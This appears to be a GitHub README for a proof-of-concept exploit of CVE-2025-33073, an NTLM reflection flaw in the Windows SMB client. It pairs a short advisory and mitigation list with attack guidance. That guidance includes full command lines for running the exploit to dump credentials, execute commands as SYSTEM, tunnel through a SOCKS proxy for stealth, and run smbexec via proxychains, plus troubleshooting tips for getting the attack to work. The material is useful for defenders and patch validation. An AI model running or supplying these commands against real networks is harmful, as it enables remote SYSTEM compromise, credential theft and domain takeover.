CVE-2025-33073# ✨ CVE-2025-33073: Windows SMB RCE Vulnerability 🚨
🔥 **High-Severity Authenticated Remote Code Execution** 🔥 Improper Access Control in Windows SMB Client (CWE-284)
---
## 🛡️ **Key Details at a Glance**
| **Aspect** | **Details** |
|--------------------------|-----------------------------------------------------------------------------|
| **CVSS v3.1 Score** | **8.8 (High)** 🔥 |
| **Affected Systems** | Windows 10, 11, Server 2012–2025 (all editions) 💻 |
| **Disclosure Date** | June 10, 2025 📅 (Patched in **June 2025 Patch Tuesday**) |
| **Exploitation** | **Actively exploited in the wild** 😱<br>Added to **CISA KEV** on Oct 21, 2025 |
| **Attack Vector** | Network (Authenticated) 🌐 |
| **Impact** | **SYSTEM-level code execution** 👑<br>Lateral movement via Kerberos relay |
| **Bypass** | NTLM reflection mitigations ⚡ |
---
## 🛠️ **Immediate Mitigations**
1. **Patch Now!** 🔧
→ Apply Microsoft updates (e.g., **KB5060998**)
→ [Microsoft Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) 🔗
2. **Enable SMB Signing** ✍️
→ Enforce on **all clients & servers**
→ `Set-SmbClientConfiguration -RequireSecuritySignature $true`
3. **Restrict NTLM** 🚫
→ Block NTLM where possible
→ Monitor for relay attempts with EDR tools
4. **Automated Fix?** 🤖
→ Use **Vicarius vRx** or custom scripts for mass remediation
---
## ⚠️ **Why It Matters**
- Bypasses traditional NTLM protections 🛑
- Works even with SMB signing **not enforced**
- Enables **full domain takeover** in misconfigured AD environments 🏰
---
> **Status as of November 15, 2025**:
> ✅ Patched
> ❌ **Still exploited in unpatched systems**
> 🔔 **CISA Deadline: Nov 10, 2025** ⏰
---
## ⚠️ **Example usage**
#### **GUI**
```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
```
<img width="1905" height="697" alt="454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c" src="https://github.com/user-attachments/assets/27c67345-41b0-4d57-a30f-1971b9f00498" />
---
#### **CLI**
```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
```
<img width="1593" height="612" alt="455126200-fff4fcde-0a93-43c9-b93e-990554ccb689" src="https://github.com/user-attachments/assets/4110dcb8-d712-4b02-aa55-d81459abb10d" />
---
**Custom command**
Instead of running secretsdump a custom command can be executed.
```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
```
<img width="1456" height="389" alt="455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534" src="https://github.com/user-attachments/assets/cba92836-e8a6-4291-abd3-c14cb08e3373" />
**SOCKS**
For more stealthy execution of commands after valid connection as SYSTEM has been made. --target and --target-ip should be equal here.
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
```
<img width="1635" height="697" alt="455140618-8cf77803-f417-4abe-a993-746049b2634c" src="https://github.com/user-attachments/assets/56dfb7e3-245c-4851-a781-8b35a6661b1a" />
Also a custom command can be ran through proxychains instead of dumping SAM.
```
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
```
<img width="1123" height="98" alt="455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea" src="https://github.com/user-attachments/assets/dfdd9feb-0962-4999-b46a-03f28c305a47" />
---
#### Manual exploit without DNS requirement
If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.
<img width="1920" height="713" alt="455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1" src="https://github.com/user-attachments/assets/43945419-144d-463a-9059-eef477d00aca" />
#### Troubleshooting:
+ I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx try adding the host to your /etc/hosts file. This should result in the attack working.
+ If using IP the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of failure. It's until now not perfectly clear why this happens. I think it has something to do with networking.
+ Try another coerce method using -M or --method.
---
#### Wireshark:
Local NTLM authentication takes place
<img width="1368" height="813" alt="455252866-0a3fe643-2d52-427a-91f2-991770732f62" src="https://github.com/user-attachments/assets/17a623d1-8bb6-4c2a-b600-e1df10843d34" />
Local NTLM authentication does not take place resulting in a FAILED attempt
<img width="1360" height="820" alt="455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348" src="https://github.com/user-attachments/assets/7edcbfa7-6012-441f-a6da-0a2756ef51b8" />
---
### Good to know:
+ xterm allows copying and pasting with the middle mouse button.
+ DNS-record should also be known to the client, this can take more time in some occasions. With more time I mean give it a couple of minutes.
+ This is just a PoC which means AV/EDR bypasses have not been tried to bypass. Use at own risk.
---
**Don’t wait — patch today!** 🛑
*Your network’s security depends on it.* 💪
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view